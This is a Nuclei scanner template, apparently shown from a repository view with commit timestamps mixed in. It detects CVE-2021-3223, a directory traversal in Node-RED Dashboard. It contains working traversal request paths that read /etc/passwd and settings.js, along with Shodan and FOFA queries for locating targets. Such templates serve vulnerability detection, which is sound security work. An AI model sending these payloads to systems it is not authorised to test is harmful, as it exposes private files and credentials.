nuclei-templates/http/cves/2021/CVE-2021-3223.yaml

46 lines
1.4 KiB
YAML
Raw Normal View History

id: CVE-2021-3223
info:
name: Node RED Dashboard <2.26.2 - Local File Inclusion
2021-07-31 09:12:48 +00:00
author: gy741,pikpikcu
severity: high
description: NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files.
reference:
- https://github.com/node-red/node-red-dashboard/issues/669
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223
- https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2
- https://nvd.nist.gov/vuln/detail/CVE-2021-3223
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-3223
cwe-id: CWE-22
cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:*:*:*
epss-score: 0.15641
2022-05-11 13:02:11 +00:00
metadata:
max-request: 2
2022-05-11 13:09:39 +00:00
verified: true
shodan-query: title:"Node-RED"
2022-05-11 13:02:11 +00:00
fofa-query: title="Node-RED"
2022-06-27 09:43:42 +00:00
tags: cve,cve2021,node-red-dashboard,lfi
http:
- method: GET
path:
- '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'
2021-07-31 09:12:48 +00:00
- '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js'
2021-08-01 19:41:43 +00:00
matchers-condition: or
matchers:
- type: regex
2021-08-01 19:41:43 +00:00
part: body
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-07-31 09:12:48 +00:00
- type: word
2021-08-01 19:41:43 +00:00
part: body
2021-07-31 09:12:48 +00:00
words:
- "Node-RED web server is listening"
# Enhanced by mp on 2022/07/15